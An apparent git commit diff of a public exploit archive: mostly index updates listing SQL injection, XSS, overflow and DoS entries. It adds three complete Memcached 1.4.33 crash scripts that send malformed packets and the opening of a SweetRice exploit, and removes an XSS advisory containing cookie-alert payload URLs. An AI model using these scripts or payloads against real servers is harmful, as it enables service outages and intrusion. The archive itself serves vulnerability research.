31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0
31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component 'com_most' - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component 'com_asortyment' - 'katid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - spyce/examples/formtag.spy Multiple Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0
31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
@ -28159,8 +28159,8 @@ id,file,description,date,author,platform,type,port
31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0
31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0
31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection",2008-02-13,S@BUN,asp,webapps,0
31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component 'com_model' - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component 'com_omnirealestate' - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 - main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0
31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - main/calendar/myagenda.php courseCode Parameter Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0
@ -28173,15 +28173,15 @@ id,file,description,date,author,platform,type,port
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0
31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0
@ -28216,10 +28216,10 @@ id,file,description,date,author,platform,type,port
31240,platforms/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 - Subject Field HTML Injection",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps,0
31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31243,platforms/php/webapps/31243.txt,"Joomla! / Mambo Component com_team - SQL Injection",2008-02-19,S@BUN,php,webapps,0
31244,platforms/php/webapps/31244.txt,"Joomla! / Mambo Component com_iigcatalog - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31245,platforms/php/webapps/31245.txt,"Joomla! / Mambo Component com_formtool - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31246,platforms/php/webapps/31246.txt,"Joomla! / Mambo Component com_genealogy - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31243,platforms/php/webapps/31243.txt,"Joomla! / Mambo Component 'com_team' - SQL Injection",2008-02-19,S@BUN,php,webapps,0
31244,platforms/php/webapps/31244.txt,"Joomla! / Mambo Component 'com_iigcatalog' - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31245,platforms/php/webapps/31245.txt,"Joomla! / Mambo Component 'com_formtool' - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31246,platforms/php/webapps/31246.txt,"Joomla! / Mambo Component 'com_genealogy' - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
40356,platforms/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",multiple,dos,0
31247,platforms/php/webapps/31247.txt,"Joomla! Component iJoomla! com_magazine - 'pageid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
@ -28256,14 +28256,14 @@ id,file,description,date,author,platform,type,port
31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component 'com_hello_world' - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
31290,platforms/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module SQL Injection",2008-02-23,S@BUN,php,webapps,0
31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component 'com_publication' - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component 'com_blog' - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' Parameter SQL Injection",2008-02-25,-=Mizo=-,php,webapps,0
31295,platforms/php/webapps/31295.txt,"Joomla! / Mambo Component com_wines 1.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
31295,platforms/php/webapps/31295.txt,"Joomla! / Mambo Component 'com_wines' 1.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0
31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0
31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0
@ -28271,7 +28271,7 @@ id,file,description,date,author,platform,type,port
31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0
31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0
31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0
31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0
31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component 'com_inter' - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0
31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0
31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0
31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow",2008-02-27,"Will Drewry",linux,remote,0
@ -28369,7 +28369,7 @@ id,file,description,date,author,platform,type,port
31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting",2008-03-17,ZoRLu,php,webapps,0
31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0
31410,platforms/php/webapps/31410.txt,"Joomla! / Mambo Component com_guide - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0
31410,platforms/php/webapps/31410.txt,"Joomla! / Mambo Component 'com_guide' - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0
31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0
31412,platforms/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0
31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0
@ -28945,7 +28945,7 @@ id,file,description,date,author,platform,type,port
32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service",2008-06-30,"Noam Rathus",multiple,dos,0
32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0
32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0
32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component 'com_is' 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0
32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0
32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0
32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0
@ -29107,7 +29107,7 @@ id,file,description,date,author,platform,type,port
32184,platforms/asp/webapps/32184.txt,"KAPhotoservice - order.asp page Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0
32185,platforms/asp/webapps/32185.txt,"KAPhotoservice - search.asp Filename Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0
32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0
32187,platforms/php/webapps/32187.txt,"Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0
32187,platforms/php/webapps/32187.txt,"Joomla! / Mambo Component 'com_utchat' 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0
32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0
32189,platforms/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0
32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0
@ -30573,7 +30573,7 @@ id,file,description,date,author,platform,type,port
33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-06-21,LiquidWorm,php,webapps,0
33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0
33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Parameter Arbitrary File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusion",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0
@ -30987,7 +30987,7 @@ id,file,description,date,author,platform,type,port
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection",2009-12-22,"Hadi Kiamarsi",php,webapps,0
34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,php,webapps,0
34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Parameter Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0
34291,platforms/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0
34291,platforms/php/webapps/34291.txt,"Joomla! Component 'Rapid-Recipe' - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0
34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0
34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
@ -31053,7 +31053,7 @@ id,file,description,date,author,platform,type,port
34370,platforms/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0
34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0
34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0
34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0
34374,platforms/php/webapps/34374.txt,"Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0
34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0
34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0
34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0
@ -33979,7 +33979,6 @@ id,file,description,date,author,platform,type,port
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
@ -35786,7 +35785,7 @@ id,file,description,date,author,platform,type,port
39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request Forgery",2016-02-16,hyp3rlinx,php,webapps,0
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0
39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - 'save_email.php' Arbitrary File Upload",2016-02-17,HaHwul,multiple,webapps,0
39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
39459,platforms/php/webapps/39459.txt,"Redaxo 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
39458,platforms/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
@ -36283,7 +36282,7 @@ id,file,description,date,author,platform,type,port
39982,platforms/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80
39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
39985,platforms/windows/remote/39985.rb,"DarkComet Server - Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
39985,platforms/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0
39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80
39988,platforms/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80
@ -36784,3 +36783,17 @@ id,file,description,date,author,platform,type,port
40690,platforms/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",hardware,webapps,0
40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
40692,platforms/php/webapps/40692.html,"SweetRice 1.5.1 - Cross-Site Request Forgery",2016-11-02,"Ashiyane Digital Security Team",php,webapps,0
40693,platforms/windows/remote/40693.py,"WinaXe 7.7 'FTP client' - Remote Buffer Overflow",2016-11-03,hyp3rlinx,windows,remote,0
40694,platforms/windows/remote/40694.txt,"Rapid PHP Editor 14.1 - Remote Command Execution",2016-11-03,hyp3rlinx,windows,remote,0
40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - PoC (1)",2016-11-01,"p0wd3r / dawu",linux,dos,0
40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - PoC (2)",2016-11-01,"p0wd3r / dawu",linux,dos,0
40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - PoC (3)",2016-11-01,"p0wd3r / dawu",linux,dos,0
40698,platforms/php/webapps/40698.py,"SweetRice 1.5.1 - Arbitrary File Download",2016-11-03,"Ashiyane Digital Security Team",php,webapps,0
40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial Of Service",2016-11-03,hyp3rlinx,windows,dos,0
40700,platforms/php/webapps/40700.html,"SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution",2016-11-03,"Ashiyane Digital Security Team",php,webapps,0
40701,platforms/php/webapps/40701.html,"ETchat 3.7 - Cross-Site Request Forgery",2016-11-03,"Hesam Bazvand",php,webapps,0
40705,platforms/php/webapps/40705.html,"sNews 1.7.1 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
40706,platforms/php/webapps/40706.txt,"sNews 1.7.1 - Arbitrary File Upload",2016-11-03,Amir.ght,php,webapps,0
40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0
40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0

Can't render this file because it is too large.

45
platforms/linux/dos/40695.c Executable file
View file

@ -0,0 +1,45 @@
# Source: http://paper.seebug.org/95/
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_PREPEND_Q = "\x1a"
key_len = struct.pack("!H",0xfa)
extra_len = "\x00"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0)
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
body = "A"*1024
if len(sys.argv) != 3:
print "./poc_crash.py <server> <port>"
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
set_packet = "set testkey 0 60 4\r\ntest\r\n"
get_packet = "get testkey\r\n"
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((sys.argv[1],int(sys.argv[2])))
s1.sendall(set_packet)
print s1.recv(1024)
s1.close()
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],int(sys.argv[2])))
s2.sendall(packet)
print s2.recv(1024)
s2.close()
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s3.connect((sys.argv[1],int(sys.argv[2])))
s3.sendall(get_packet)
s3.recv(1024)
s3.close()

30
platforms/linux/dos/40696.c Executable file
View file

@ -0,0 +1,30 @@
# Source: http://paper.seebug.org/95/
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_ADD = "\x02"
key_len = struct.pack("!H",0xfa)
extra_len = "\x08"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0xffffffd0)
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
extras_flags = 0xdeadbeef
extras_expiry = struct.pack("!I",0xe10)
body = "A"*1024
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
if len(sys.argv) != 3:
print "./poc_add.py <server> <port>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()

19
platforms/linux/dos/40697.c Executable file
View file

@ -0,0 +1,19 @@
# Source: http://paper.seebug.org/95/
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_SET = "\x21"
key_len = struct.pack("!H",32)
body_len = struct.pack("!I",1)
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + "A"*1000
if len(sys.argv) != 3:
print "./poc_sasl.py <server> <ip>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()

11
platforms/php/webapps/37539.txt
View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/54670/info
REDAXO is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
REDAXO 4.4 is vulnerable; prior versions may also be affected.
http://www.example.com/redaxo/index.php?page=user&subpage=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
http://www.example.com/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E

74
platforms/php/webapps/40698.py Executable file
View file

@ -0,0 +1,74 @@
#/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql
import requests
import os
from requests import session
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
